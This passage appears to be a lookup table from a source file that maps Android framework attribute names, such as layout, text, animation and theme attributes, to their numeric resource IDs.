'paddingRight' : 16842968,
'paddingBottom' : 16842969,
'focusable' : 16842970,
'focusableInTouchMode' : 16842971,
'visibility' : 16842972,
'fitsSystemWindows' : 16842973,
'scrollbars' : 16842974,
'fadingEdge' : 16842975,
'fadingEdgeLength' : 16842976,
'nextFocusLeft' : 16842977,
'nextFocusRight' : 16842978,
'nextFocusUp' : 16842979,
'nextFocusDown' : 16842980,
'clickable' : 16842981,
'longClickable' : 16842982,
'saveEnabled' : 16842983,
'drawingCacheQuality' : 16842984,
'duplicateParentState' : 16842985,
'clipChildren' : 16842986,
'clipToPadding' : 16842987,
'layoutAnimation' : 16842988,
'animationCache' : 16842989,
'persistentDrawingCache' : 16842990,
'alwaysDrawnWithCache' : 16842991,
'addStatesFromChildren' : 16842992,
'descendantFocusability' : 16842993,
'layout' : 16842994,
'inflatedId' : 16842995,
'layout_width' : 16842996,
'layout_height' : 16842997,
'layout_margin' : 16842998,
'layout_marginLeft' : 16842999,
'layout_marginTop' : 16843000,
'layout_marginRight' : 16843001,
'layout_marginBottom' : 16843002,
'listSelector' : 16843003,
'drawSelectorOnTop' : 16843004,
'stackFromBottom' : 16843005,
'scrollingCache' : 16843006,
'textFilterEnabled' : 16843007,
'transcriptMode' : 16843008,
'cacheColorHint' : 16843009,
'dial' : 16843010,
'hand_hour' : 16843011,
'hand_minute' : 16843012,
'format' : 16843013,
'checked' : 16843014,
'button' : 16843015,
'checkMark' : 16843016,
'foreground' : 16843017,
'measureAllChildren' : 16843018,
'groupIndicator' : 16843019,
'childIndicator' : 16843020,
'indicatorLeft' : 16843021,
'indicatorRight' : 16843022,
'childIndicatorLeft' : 16843023,
'childIndicatorRight' : 16843024,
'childDivider' : 16843025,
'animationDuration' : 16843026,
'spacing' : 16843027,
'horizontalSpacing' : 16843028,
'verticalSpacing' : 16843029,
'stretchMode' : 16843030,
'columnWidth' : 16843031,
'numColumns' : 16843032,
'src' : 16843033,
'antialias' : 16843034,
'filter' : 16843035,
'dither' : 16843036,
'scaleType' : 16843037,
'adjustViewBounds' : 16843038,
'maxWidth' : 16843039,
'maxHeight' : 16843040,
'tint' : 16843041,
'baselineAlignBottom' : 16843042,
'cropToPadding' : 16843043,
'textOn' : 16843044,
'textOff' : 16843045,
'baselineAligned' : 16843046,
'baselineAlignedChildIndex' : 16843047,
'weightSum' : 16843048,
'divider' : 16843049,
'dividerHeight' : 16843050,
'choiceMode' : 16843051,
'itemTextAppearance' : 16843052,
'horizontalDivider' : 16843053,
'verticalDivider' : 16843054,
'headerBackground' : 16843055,
'itemBackground' : 16843056,
'itemIconDisabledAlpha' : 16843057,
'rowHeight' : 16843058,
'maxRows' : 16843059,
'maxItemsPerRow' : 16843060,
'moreIcon' : 16843061,
'max' : 16843062,
'progress' : 16843063,
'secondaryProgress' : 16843064,
'indeterminate' : 16843065,
'indeterminateOnly' : 16843066,
'indeterminateDrawable' : 16843067,
'progressDrawable' : 16843068,
'indeterminateDuration' : 16843069,
'indeterminateBehavior' : 16843070,
'minWidth' : 16843071,
'minHeight' : 16843072,
'interpolator' : 16843073,
'thumb' : 16843074,
'thumbOffset' : 16843075,
'numStars' : 16843076,
'rating' : 16843077,
'stepSize' : 16843078,
'isIndicator' : 16843079,
'checkedButton' : 16843080,
'stretchColumns' : 16843081,
'shrinkColumns' : 16843082,
'collapseColumns' : 16843083,
'layout_column' : 16843084,
'layout_span' : 16843085,
'bufferType' : 16843086,
'text' : 16843087,
'hint' : 16843088,
'textScaleX' : 16843089,
'cursorVisible' : 16843090,
'maxLines' : 16843091,
'lines' : 16843092,
'height' : 16843093,
'minLines' : 16843094,
'maxEms' : 16843095,
'ems' : 16843096,
'width' : 16843097,
'minEms' : 16843098,
'scrollHorizontally' : 16843099,
'password' : 16843100,
'singleLine' : 16843101,
'selectAllOnFocus' : 16843102,
'includeFontPadding' : 16843103,
'maxLength' : 16843104,
'shadowColor' : 16843105,
'shadowDx' : 16843106,
'shadowDy' : 16843107,
'shadowRadius' : 16843108,
'numeric' : 16843109,
'digits' : 16843110,
'phoneNumber' : 16843111,
'inputMethod' : 16843112,
'capitalize' : 16843113,
'autoText' : 16843114,
'editable' : 16843115,
'freezesText' : 16843116,
'drawableTop' : 16843117,
'drawableBottom' : 16843118,
'drawableLeft' : 16843119,
'drawableRight' : 16843120,
'drawablePadding' : 16843121,
'completionHint' : 16843122,
'completionHintView' : 16843123,
'completionThreshold' : 16843124,
'dropDownSelector' : 16843125,
'popupBackground' : 16843126,
'inAnimation' : 16843127,
'outAnimation' : 16843128,
'flipInterval' : 16843129,
'fillViewport' : 16843130,
'prompt' : 16843131,
'startYear' : 16843132,
'endYear' : 16843133,
'mode' : 16843134,
'layout_x' : 16843135,
'layout_y' : 16843136,
'layout_weight' : 16843137,
'layout_toLeftOf' : 16843138,
'layout_toRightOf' : 16843139,
'layout_above' : 16843140,
'layout_below' : 16843141,
'layout_alignBaseline' : 16843142,
'layout_alignLeft' : 16843143,
'layout_alignTop' : 16843144,
'layout_alignRight' : 16843145,
'layout_alignBottom' : 16843146,
'layout_alignParentLeft' : 16843147,
'layout_alignParentTop' : 16843148,
'layout_alignParentRight' : 16843149,
'layout_alignParentBottom' : 16843150,
'layout_centerInParent' : 16843151,
'layout_centerHorizontal' : 16843152,
'layout_centerVertical' : 16843153,
'layout_alignWithParentIfMissing' : 16843154,
'layout_scale' : 16843155,
'visible' : 16843156,
'variablePadding' : 16843157,
'constantSize' : 16843158,
'oneshot' : 16843159,
'duration' : 16843160,
'drawable' : 16843161,
'shape' : 16843162,
'innerRadiusRatio' : 16843163,
'thicknessRatio' : 16843164,
'startColor' : 16843165,
'endColor' : 16843166,
'useLevel' : 16843167,
'angle' : 16843168,
'type' : 16843169,
'centerX' : 16843170,
'centerY' : 16843171,
'gradientRadius' : 16843172,
'color' : 16843173,
'dashWidth' : 16843174,
'dashGap' : 16843175,
'radius' : 16843176,
'topLeftRadius' : 16843177,
'topRightRadius' : 16843178,
'bottomLeftRadius' : 16843179,
'bottomRightRadius' : 16843180,
'left' : 16843181,
'top' : 16843182,
'right' : 16843183,
'bottom' : 16843184,
'minLevel' : 16843185,
'maxLevel' : 16843186,
'fromDegrees' : 16843187,
'toDegrees' : 16843188,
'pivotX' : 16843189,
'pivotY' : 16843190,
'insetLeft' : 16843191,
'insetRight' : 16843192,
'insetTop' : 16843193,
'insetBottom' : 16843194,
'shareInterpolator' : 16843195,
'fillBefore' : 16843196,
'fillAfter' : 16843197,
'startOffset' : 16843198,
'repeatCount' : 16843199,
'repeatMode' : 16843200,
'zAdjustment' : 16843201,
'fromXScale' : 16843202,
'toXScale' : 16843203,
'fromYScale' : 16843204,
'toYScale' : 16843205,
'fromXDelta' : 16843206,
'toXDelta' : 16843207,
'fromYDelta' : 16843208,
'toYDelta' : 16843209,
'fromAlpha' : 16843210,
'toAlpha' : 16843211,
'delay' : 16843212,
'animation' : 16843213,
'animationOrder' : 16843214,
'columnDelay' : 16843215,
'rowDelay' : 16843216,
'direction' : 16843217,
'directionPriority' : 16843218,
'factor' : 16843219,
'cycles' : 16843220,
'searchMode' : 16843221,
'searchSuggestAuthority' : 16843222,
'searchSuggestPath' : 16843223,
'searchSuggestSelection' : 16843224,
'searchSuggestIntentAction' : 16843225,
'searchSuggestIntentData' : 16843226,
'queryActionMsg' : 16843227,
'suggestActionMsg' : 16843228,
'suggestActionMsgColumn' : 16843229,
'menuCategory' : 16843230,
'orderInCategory' : 16843231,
'checkableBehavior' : 16843232,
'title' : 16843233,
'titleCondensed' : 16843234,
'alphabeticShortcut' : 16843235,
'numericShortcut' : 16843236,
'checkable' : 16843237,
'selectable' : 16843238,
'orderingFromXml' : 16843239,
'key' : 16843240,
'summary' : 16843241,
'order' : 16843242,
'widgetLayout' : 16843243,
'dependency' : 16843244,
'defaultValue' : 16843245,
'shouldDisableView' : 16843246,
'summaryOn' : 16843247,
'summaryOff' : 16843248,
'disableDependentsState' : 16843249,
'dialogTitle' : 16843250,
'dialogMessage' : 16843251,
'dialogIcon' : 16843252,
'positiveButtonText' : 16843253,
'negativeButtonText' : 16843254,
'dialogLayout' : 16843255,
'entryValues' : 16843256,
'ringtoneType' : 16843257,
'showDefault' : 16843258,
'showSilent' : 16843259,
'scaleWidth' : 16843260,
'scaleHeight' : 16843261,
'scaleGravity' : 16843262,
'ignoreGravity' : 16843263,
'foregroundGravity' : 16843264,
'tileMode' : 16843265,
'targetActivity' : 16843266,
'alwaysRetainTaskState' : 16843267,
'allowTaskReparenting' : 16843268,
'searchButtonText' : 16843269,
'colorForegroundInverse' : 16843270,
'textAppearanceButton' : 16843271,
'listSeparatorTextViewStyle' : 16843272,
'streamType' : 16843273,
'clipOrientation' : 16843274,
'centerColor' : 16843275,
'minSdkVersion' : 16843276,
'windowFullscreen' : 16843277,
'unselectedAlpha' : 16843278,
'progressBarStyleSmallTitle' : 16843279,
'ratingBarStyleIndicator' : 16843280,
'apiKey' : 16843281,
'textColorTertiary' : 16843282,
'textColorTertiaryInverse' : 16843283,
'listDivider' : 16843284,
'soundEffectsEnabled' : 16843285,
'keepScreenOn' : 16843286,
'lineSpacingExtra' : 16843287,
'lineSpacingMultiplier' : 16843288,
'listChoiceIndicatorSingle' : 16843289,
'listChoiceIndicatorMultiple' : 16843290,
'versionCode' : 16843291,
'versionName' : 16843292,
'marqueeRepeatLimit' : 16843293,
'windowNoDisplay' : 16843294,
'backgroundDimEnabled' : 16843295,
'inputType' : 16843296,
'isDefault' : 16843297,
'windowDisablePreview' : 16843298,
'privateImeOptions' : 16843299,
'editorExtras' : 16843300,
'settingsActivity' : 16843301,
'fastScrollEnabled' : 16843302,
'reqTouchScreen' : 16843303,
'reqKeyboardType' : 16843304,
'reqHardKeyboard' : 16843305,
'reqNavigation' : 16843306,
'windowSoftInputMode' : 16843307,
'imeFullscreenBackground' : 16843308,
'noHistory' : 16843309,
'headerDividersEnabled' : 16843310,
'footerDividersEnabled' : 16843311,
'candidatesTextStyleSpans' : 16843312,
'smoothScrollbar' : 16843313,
'reqFiveWayNav' : 16843314,
'keyBackground' : 16843315,
'keyTextSize' : 16843316,
'labelTextSize' : 16843317,
'keyTextColor' : 16843318,
'keyPreviewLayout' : 16843319,
'keyPreviewOffset' : 16843320,
'keyPreviewHeight' : 16843321,
'verticalCorrection' : 16843322,
'popupLayout' : 16843323,
'state_long_pressable' : 16843324,
'keyWidth' : 16843325,
'keyHeight' : 16843326,
'horizontalGap' : 16843327,
'verticalGap' : 16843328,
'rowEdgeFlags' : 16843329,
'codes' : 16843330,
'popupKeyboard' : 16843331,
'popupCharacters' : 16843332,
'keyEdgeFlags' : 16843333,
'isModifier' : 16843334,
'isSticky' : 16843335,
'isRepeatable' : 16843336,
'iconPreview' : 16843337,
'keyOutputText' : 16843338,
'keyLabel' : 16843339,
'keyIcon' : 16843340,
'keyboardMode' : 16843341,
'isScrollContainer' : 16843342,
'fillEnabled' : 16843343,
'updatePeriodMillis' : 16843344,
'initialLayout' : 16843345,
'voiceSearchMode' : 16843346,
'voiceLanguageModel' : 16843347,
'voicePromptText' : 16843348,
'voiceLanguage' : 16843349,
'voiceMaxResults' : 16843350,
'bottomOffset' : 16843351,
'topOffset' : 16843352,
'allowSingleTap' : 16843353,
'handle' : 16843354,
'content' : 16843355,
'animateOnClick' : 16843356,
'configure' : 16843357,
'hapticFeedbackEnabled' : 16843358,
'innerRadius' : 16843359,
'thickness' : 16843360,
'sharedUserLabel' : 16843361,
'dropDownWidth' : 16843362,
'dropDownAnchor' : 16843363,
'imeOptions' : 16843364,
'imeActionLabel' : 16843365,
'imeActionId' : 16843366,
'imeExtractEnterAnimation' : 16843368,
'imeExtractExitAnimation' : 16843369,
'tension' : 16843370,
'extraTension' : 16843371,
'anyDensity' : 16843372,
'searchSuggestThreshold' : 16843373,
'includeInGlobalSearch' : 16843374,
'onClick' : 16843375,
'targetSdkVersion' : 16843376,
'maxSdkVersion' : 16843377,
'testOnly' : 16843378,
'contentDescription' : 16843379,
'gestureStrokeWidth' : 16843380,
'gestureColor' : 16843381,
'uncertainGestureColor' : 16843382,
'fadeOffset' : 16843383,
'fadeDuration' : 16843384,
'gestureStrokeType' : 16843385,
'gestureStrokeLengthThreshold' : 16843386,
'gestureStrokeSquarenessThreshold' : 16843387,
'gestureStrokeAngleThreshold' : 16843388,
'eventsInterceptionEnabled' : 16843389,
'fadeEnabled' : 16843390,
'backupAgent' : 16843391,
'allowBackup' : 16843392,
'glEsVersion' : 16843393,
'queryAfterZeroResults' : 16843394,
'dropDownHeight' : 16843395,
'smallScreens' : 16843396,
'normalScreens' : 16843397,
'largeScreens' : 16843398,
'progressBarStyleInverse' : 16843399,
'progressBarStyleSmallInverse' : 16843400,
'progressBarStyleLargeInverse' : 16843401,
'searchSettingsDescription' : 16843402,
'textColorPrimaryInverseDisableOnly' : 16843403,
'autoUrlDetect' : 16843404,
'resizeable' : 16843405,
'required' : 16843406,
'accountType' : 16843407,
'contentAuthority' : 16843408,
'userVisible' : 16843409,
'windowShowWallpaper' : 16843410,
'wallpaperOpenEnterAnimation' : 16843411,
'wallpaperOpenExitAnimation' : 16843412,
'wallpaperCloseEnterAnimation' : 16843413,
'wallpaperCloseExitAnimation' : 16843414,
'wallpaperIntraOpenEnterAnimation' : 16843415,
'wallpaperIntraOpenExitAnimation' : 16843416,
'wallpaperIntraCloseEnterAnimation' : 16843417,
'wallpaperIntraCloseExitAnimation' : 16843418,
'supportsUploading' : 16843419,
'killAfterRestore' : 16843420,
'restoreNeedsApplication' : 16843421,
'smallIcon' : 16843422,
'accountPreferences' : 16843423,
'textAppearanceSearchResultSubtitle' : 16843424,
'textAppearanceSearchResultTitle' : 16843425,
'summaryColumn' : 16843426,
'detailColumn' : 16843427,
'detailSocialSummary' : 16843428,
'thumbnail' : 16843429,
'detachWallpaper' : 16843430,
'finishOnCloseSystemDialogs' : 16843431,
'scrollbarFadeDuration' : 16843432,
'scrollbarDefaultDelayBeforeFade' : 16843433,
'fadeScrollbars' : 16843434,
'colorBackgroundCacheHint' : 16843435,
'dropDownHorizontalOffset' : 16843436,
'dropDownVerticalOffset' : 16843437,
'quickContactBadgeStyleWindowSmall' : 16843438,
'quickContactBadgeStyleWindowMedium' : 16843439,
'quickContactBadgeStyleWindowLarge' : 16843440,
'quickContactBadgeStyleSmallWindowSmall' : 16843441,
'quickContactBadgeStyleSmallWindowMedium' : 16843442,
'quickContactBadgeStyleSmallWindowLarge' : 16843443,
'author' : 16843444,
'autoStart' : 16843445,
'expandableListViewWhiteStyle' : 16843446,
'installLocation' : 16843447,
'vmSafeMode' : 16843448,
'webTextViewStyle' : 16843449,
'restoreAnyVersion' : 16843450,
'tabStripLeft' : 16843451,
'tabStripRight' : 16843452,
'tabStripEnabled' : 16843453,
'logo' : 16843454,
'xlargeScreens' : 16843455,
'immersive' : 16843456,
'overScrollMode' : 16843457,
'overScrollHeader' : 16843458,
'overScrollFooter' : 16843459,
'filterTouchesWhenObscured' : 16843460,
'textSelectHandleLeft' : 16843461,
'textSelectHandleRight' : 16843462,
'textSelectHandle' : 16843463,
'textSelectHandleWindowStyle' : 16843464,
'popupAnimationStyle' : 16843465,
'screenSize' : 16843466,
'screenDensity' : 16843467,
'allContactsName' : 16843468,
'windowActionBar' : 16843469,
'actionBarStyle' : 16843470,
'navigationMode' : 16843471,
'displayOptions' : 16843472,
'subtitle' : 16843473,
'customNavigationLayout' : 16843474,
'hardwareAccelerated' : 16843475,
'measureWithLargestChild' : 16843476,
'animateFirstView' : 16843477,
'dropDownSpinnerStyle' : 16843478,
'actionDropDownStyle' : 16843479,
'actionButtonStyle' : 16843480,
'showAsAction' : 16843481,
'previewImage' : 16843482,
'actionModeBackground' : 16843483,
'actionModeCloseDrawable' : 16843484,
'windowActionModeOverlay' : 16843485,
'valueFrom' : 16843486,
'valueTo' : 16843487,
'valueType' : 16843488,
'propertyName' : 16843489,
'ordering' : 16843490,
'fragment' : 16843491,
'windowActionBarOverlay' : 16843492,
'fragmentOpenEnterAnimation' : 16843493,
'fragmentOpenExitAnimation' : 16843494,
'fragmentCloseEnterAnimation' : 16843495,
'fragmentCloseExitAnimation' : 16843496,
'fragmentFadeEnterAnimation' : 16843497,
'fragmentFadeExitAnimation' : 16843498,
'actionBarSize' : 16843499,
'imeSubtypeLocale' : 16843500,
'imeSubtypeMode' : 16843501,
'imeSubtypeExtraValue' : 16843502,
'splitMotionEvents' : 16843503,
'listChoiceBackgroundIndicator' : 16843504,
'spinnerMode' : 16843505,
'animateLayoutChanges' : 16843506,
'actionBarTabStyle' : 16843507,
'actionBarTabBarStyle' : 16843508,
'actionBarTabTextStyle' : 16843509,
'actionOverflowButtonStyle' : 16843510,
'actionModeCloseButtonStyle' : 16843511,
'titleTextStyle' : 16843512,
'subtitleTextStyle' : 16843513,
'iconifiedByDefault' : 16843514,
'actionLayout' : 16843515,
'actionViewClass' : 16843516,
'activatedBackgroundIndicator' : 16843517,
'state_activated' : 16843518,
'listPopupWindowStyle' : 16843519,
'popupMenuStyle' : 16843520,
'textAppearanceLargePopupMenu' : 16843521,
'textAppearanceSmallPopupMenu' : 16843522,
'breadCrumbTitle' : 16843523,
'breadCrumbShortTitle' : 16843524,
'listDividerAlertDialog' : 16843525,
'textColorAlertDialogListItem' : 16843526,
'loopViews' : 16843527,
'dialogTheme' : 16843528,
'alertDialogTheme' : 16843529,
'dividerVertical' : 16843530,
'homeAsUpIndicator' : 16843531,
'enterFadeDuration' : 16843532,
'exitFadeDuration' : 16843533,
'selectableItemBackground' : 16843534,
'autoAdvanceViewId' : 16843535,
'useIntrinsicSizeAsMinimum' : 16843536,
'actionModeCutDrawable' : 16843537,
'actionModeCopyDrawable' : 16843538,
'actionModePasteDrawable' : 16843539,
'textEditPasteWindowLayout' : 16843540,
'textEditNoPasteWindowLayout' : 16843541,
'textIsSelectable' : 16843542,
'windowEnableSplitTouch' : 16843543,
'indeterminateProgressStyle' : 16843544,
'progressBarPadding' : 16843545,
'animationResolution' : 16843546,
'state_accelerated' : 16843547,
'baseline' : 16843548,
'homeLayout' : 16843549,
'opacity' : 16843550,
'alpha' : 16843551,
'transformPivotX' : 16843552,
'transformPivotY' : 16843553,
'translationX' : 16843554,
'translationY' : 16843555,
'scaleX' : 16843556,
'scaleY' : 16843557,
'rotation' : 16843558,
'rotationX' : 16843559,
'rotationY' : 16843560,
'showDividers' : 16843561,
'dividerPadding' : 16843562,
'borderlessButtonStyle' : 16843563,
'dividerHorizontal' : 16843564,
'itemPadding' : 16843565,
'buttonBarStyle' : 16843566,
'buttonBarButtonStyle' : 16843567,
'segmentedButtonStyle' : 16843568,
'staticWallpaperPreview' : 16843569,
'allowParallelSyncs' : 16843570,
'isAlwaysSyncable' : 16843571,
'verticalScrollbarPosition' : 16843572,
'fastScrollAlwaysVisible' : 16843573,
'fastScrollThumbDrawable' : 16843574,
'fastScrollPreviewBackgroundLeft' : 16843575,
'fastScrollPreviewBackgroundRight' : 16843576,
'fastScrollTrackDrawable' : 16843577,
'fastScrollOverlayPosition' : 16843578,
'customTokens' : 16843579,
'nextFocusForward' : 16843580,
'firstDayOfWeek' : 16843581,
'showWeekNumber' : 16843582,
'minDate' : 16843583,
'maxDate' : 16843584,
'shownWeekCount' : 16843585,
'selectedWeekBackgroundColor' : 16843586,
'focusedMonthDateColor' : 16843587,
'unfocusedMonthDateColor' : 16843588,
'weekNumberColor' : 16843589,
'weekSeparatorLineColor' : 16843590,
'selectedDateVerticalBar' : 16843591,
'weekDayTextAppearance' : 16843592,
'dateTextAppearance' : 16843593,
'solidColor' : 16843594,
'spinnersShown' : 16843595,
'calendarViewShown' : 16843596,
'state_multiline' : 16843597,
'detailsElementBackground' : 16843598,
'textColorHighlightInverse' : 16843599,
'textColorLinkInverse' : 16843600,
'editTextColor' : 16843601,
'editTextBackground' : 16843602,
'horizontalScrollViewStyle' : 16843603,
'layerType' : 16843604,
'alertDialogIcon' : 16843605,
'windowMinWidthMajor' : 16843606,
'windowMinWidthMinor' : 16843607,
'queryHint' : 16843608,
'fastScrollTextColor' : 16843609,
'largeHeap' : 16843610,
'windowCloseOnTouchOutside' : 16843611,
'datePickerStyle' : 16843612,
'calendarViewStyle' : 16843613,
'textEditSidePasteWindowLayout' : 16843614,
'textEditSideNoPasteWindowLayout' : 16843615,
'actionMenuTextAppearance' : 16843616,
'actionMenuTextColor' : 16843617,
'textCursorDrawable' : 16843618,
'resizeMode' : 16843619,
'requiresSmallestWidthDp' : 16843620,
'compatibleWidthLimitDp' : 16843621,
'largestWidthLimitDp' : 16843622,
'state_hovered' : 16843623,
'state_drag_can_accept' : 16843624,
'state_drag_hovered' : 16843625,
'stopWithTask' : 16843626,
'switchTextOn' : 16843627,
'switchTextOff' : 16843628,
'switchPreferenceStyle' : 16843629,
'switchTextAppearance' : 16843630,
'track' : 16843631,
'switchMinWidth' : 16843632,
'switchPadding' : 16843633,
'thumbTextPadding' : 16843634,
'textSuggestionsWindowStyle' : 16843635,
'textEditSuggestionItemLayout' : 16843636,
'rowCount' : 16843637,
'rowOrderPreserved' : 16843638,
'columnCount' : 16843639,
'columnOrderPreserved' : 16843640,
'useDefaultMargins' : 16843641,
'alignmentMode' : 16843642,
'layout_row' : 16843643,
'layout_rowSpan' : 16843644,
'layout_columnSpan' : 16843645,
'actionModeSelectAllDrawable' : 16843646,
'isAuxiliary' : 16843647,
'accessibilityEventTypes' : 16843648,
'packageNames' : 16843649,
'accessibilityFeedbackType' : 16843650,
'notificationTimeout' : 16843651,
'accessibilityFlags' : 16843652,
'canRetrieveWindowContent' : 16843653,
'listPreferredItemHeightLarge' : 16843654,
'listPreferredItemHeightSmall' : 16843655,
'actionBarSplitStyle' : 16843656,
'actionProviderClass' : 16843657,
'backgroundStacked' : 16843658,
'backgroundSplit' : 16843659,
'textAllCaps' : 16843660,
'colorPressedHighlight' : 16843661,
'colorLongPressedHighlight' : 16843662,
'colorFocusedHighlight' : 16843663,
'colorActivatedHighlight' : 16843664,
'colorMultiSelectHighlight' : 16843665,
'drawableStart' : 16843666,
'drawableEnd' : 16843667,
'actionModeStyle' : 16843668,
'minResizeWidth' : 16843669,
'minResizeHeight' : 16843670,
'actionBarWidgetTheme' : 16843671,
'uiOptions' : 16843672,
'subtypeLocale' : 16843673,
'subtypeExtraValue' : 16843674,
'actionBarDivider' : 16843675,
'actionBarItemBackground' : 16843676,
'actionModeSplitBackground' : 16843677,
'textAppearanceListItem' : 16843678,
'textAppearanceListItemSmall' : 16843679,
'targetDescriptions' : 16843680,
'directionDescriptions' : 16843681,
'overridesImplicitlyEnabledSubtype' : 16843682,
'listPreferredItemPaddingLeft' : 16843683,
'listPreferredItemPaddingRight' : 16843684,
'requiresFadingEdge' : 16843685,
'publicKey' : 16843686,
'parentActivityName' : 16843687,
'isolatedProcess' : 16843689,
'importantForAccessibility' : 16843690,
'keyboardLayout' : 16843691,
'fontFamily' : 16843692,
'mediaRouteButtonStyle' : 16843693,
'mediaRouteTypes' : 16843694,
'supportsRtl' : 16843695,
'textDirection' : 16843696,
'textAlignment' : 16843697,
'layoutDirection' : 16843698,
'paddingStart' : 16843699,
'paddingEnd' : 16843700,
'layout_marginStart' : 16843701,
'layout_marginEnd' : 16843702,
'layout_toStartOf' : 16843703,
'layout_toEndOf' : 16843704,
'layout_alignStart' : 16843705,
'layout_alignEnd' : 16843706,
'layout_alignParentStart' : 16843707,
'layout_alignParentEnd' : 16843708,
'listPreferredItemPaddingStart' : 16843709,
'listPreferredItemPaddingEnd' : 16843710,
'singleUser' : 16843711,
'presentationTheme' : 16843712,
'subtypeId' : 16843713,
'initialKeyguardLayout' : 16843714,
'widgetCategory' : 16843716,
'permissionGroupFlags' : 16843717,
'labelFor' : 16843718,
'permissionFlags' : 16843719,
'checkedTextViewStyle' : 16843720,
'showOnLockScreen' : 16843721,
'format12Hour' : 16843722,
'format24Hour' : 16843723,
'timeZone' : 16843724,
'mipMap' : 16843725,
'mirrorForRtl' : 16843726,
'windowOverscan' : 16843727,
'requiredForAllUsers' : 16843728,
'indicatorStart' : 16843729,
'indicatorEnd' : 16843730,
'childIndicatorStart' : 16843731,
'childIndicatorEnd' : 16843732,
'restrictedAccountType' : 16843733,
'requiredAccountType' : 16843734,
'canRequestTouchExplorationMode' : 16843735,
'canRequestEnhancedWebAccessibility' : 16843736,
'canRequestFilterKeyEvents' : 16843737,
'layoutMode' : 16843738,
'keySet' : 16843739,
'targetId' : 16843740,
'fromScene' : 16843741,
'toScene' : 16843742,
'transition' : 16843743,
'transitionOrdering' : 16843744,
'fadingMode' : 16843745,
'startDelay' : 16843746,
'ssp' : 16843747,
'sspPrefix' : 16843748,
'sspPattern' : 16843749,
'addPrintersActivity' : 16843750,
'vendor' : 16843751,
'category' : 16843752,
'isAsciiCapable' : 16843753,
'autoMirrored' : 16843754,
'supportsSwitchingToNextInputMethod' : 16843755,
'requireDeviceUnlock' : 16843756,
'apduServiceBanner' : 16843757,
'accessibilityLiveRegion' : 16843758,
'windowTranslucentStatus' : 16843759,
'windowTranslucentNavigation' : 16843760,
'advancedPrintOptionsActivity' : 16843761,
'banner' : 16843762,
'windowSwipeToDismiss' : 16843763,
'isGame' : 16843764,
'allowEmbedded' : 16843765,
'setupActivity' : 16843766,
'fastScrollStyle' : 16843767,
'windowContentTransitions' : 16843768,
'windowContentTransitionManager' : 16843769,
'translationZ' : 16843770,
'tintMode' : 16843771,
'controlX1' : 16843772,
'controlY1' : 16843773,
'controlX2' : 16843774,
'controlY2' : 16843775,
'transitionName' : 16843776,
'transitionGroup' : 16843777,
'viewportWidth' : 16843778,
'viewportHeight' : 16843779,
'fillColor' : 16843780,
'pathData' : 16843781,
'strokeColor' : 16843782,
'strokeWidth' : 16843783,
'trimPathStart' : 16843784,
'trimPathEnd' : 16843785,
'trimPathOffset' : 16843786,
'strokeLineCap' : 16843787,
'strokeLineJoin' : 16843788,
'strokeMiterLimit' : 16843789,
'colorControlNormal' : 16843817,
'colorControlActivated' : 16843818,
'colorButtonNormal' : 16843819,
'colorControlHighlight' : 16843820,
'persistableMode' : 16843821,
'titleTextAppearance' : 16843822,
'subtitleTextAppearance' : 16843823,
'slideEdge' : 16843824,
'actionBarTheme' : 16843825,
'textAppearanceListItemSecondary' : 16843826,
'colorPrimary' : 16843827,
'colorPrimaryDark' : 16843828,
'colorAccent' : 16843829,
'nestedScrollingEnabled' : 16843830,
'windowEnterTransition' : 16843831,
'windowExitTransition' : 16843832,
'windowSharedElementEnterTransition' : 16843833,
'windowSharedElementExitTransition' : 16843834,
'windowAllowReturnTransitionOverlap' : 16843835,
'windowAllowEnterTransitionOverlap' : 16843836,
'sessionService' : 16843837,
'stackViewStyle' : 16843838,
'switchStyle' : 16843839,
'elevation' : 16843840,
'excludeId' : 16843841,
'excludeClass' : 16843842,
'hideOnContentScroll' : 16843843,
'actionOverflowMenuStyle' : 16843844,
'documentLaunchMode' : 16843845,
'maxRecents' : 16843846,
'autoRemoveFromRecents' : 16843847,
'stateListAnimator' : 16843848,
'toId' : 16843849,
'fromId' : 16843850,
'reversible' : 16843851,
'splitTrack' : 16843852,
'targetName' : 16843853,
'excludeName' : 16843854,
'matchOrder' : 16843855,
'windowDrawsSystemBarBackgrounds' : 16843856,
'statusBarColor' : 16843857,
'navigationBarColor' : 16843858,
'contentInsetStart' : 16843859,
'contentInsetEnd' : 16843860,
'contentInsetLeft' : 16843861,
'contentInsetRight' : 16843862,
'paddingMode' : 16843863,
'layout_rowWeight' : 16843864,
'layout_columnWeight' : 16843865,
'translateX' : 16843866,
'translateY' : 16843867,
'selectableItemBackgroundBorderless' : 16843868,
'elegantTextHeight' : 16843869,
'searchKeyphraseId' : 16843870,
'searchKeyphrase' : 16843871,
'searchKeyphraseSupportedLocales' : 16843872,
'windowTransitionBackgroundFadeDuration' : 16843873,
'overlapAnchor' : 16843874,
'progressTint' : 16843875,
'progressTintMode' : 16843876,
'progressBackgroundTint' : 16843877,
'progressBackgroundTintMode' : 16843878,
'secondaryProgressTint' : 16843879,
'secondaryProgressTintMode' : 16843880,
'indeterminateTint' : 16843881,
'indeterminateTintMode' : 16843882,
'backgroundTint' : 16843883,
'backgroundTintMode' : 16843884,
'foregroundTint' : 16843885,
'foregroundTintMode' : 16843886,
'buttonTint' : 16843887,
'buttonTintMode' : 16843888,
'thumbTint' : 16843889,
'thumbTintMode' : 16843890,
'fullBackupOnly' : 16843891,
'propertyXName' : 16843892,
'propertyYName' : 16843893,
'relinquishTaskIdentity' : 16843894,
'tileModeX' : 16843895,
'tileModeY' : 16843896,
'actionModeShareDrawable' : 16843897,
'actionModeFindDrawable' : 16843898,
'actionModeWebSearchDrawable' : 16843899,
'transitionVisibilityMode' : 16843900,
'minimumHorizontalAngle' : 16843901,
'minimumVerticalAngle' : 16843902,
'maximumAngle' : 16843903,
'searchViewStyle' : 16843904,
'closeIcon' : 16843905,
'goIcon' : 16843906,
'searchIcon' : 16843907,
'voiceIcon' : 16843908,
'commitIcon' : 16843909,
'suggestionRowLayout' : 16843910,
'queryBackground' : 16843911,
'submitBackground' : 16843912,
'buttonBarPositiveButtonStyle' : 16843913,
'buttonBarNeutralButtonStyle' : 16843914,
'buttonBarNegativeButtonStyle' : 16843915,
'popupElevation' : 16843916,
'actionBarPopupTheme' : 16843917,
'multiArch' : 16843918,
'touchscreenBlocksFocus' : 16843919,
'windowElevation' : 16843920,
'launchTaskBehindTargetAnimation' : 16843921,
'launchTaskBehindSourceAnimation' : 16843922,
'restrictionType' : 16843923,
'dayOfWeekBackground' : 16843924,
'dayOfWeekTextAppearance' : 16843925,
'headerMonthTextAppearance' : 16843926,
'headerDayOfMonthTextAppearance' : 16843927,
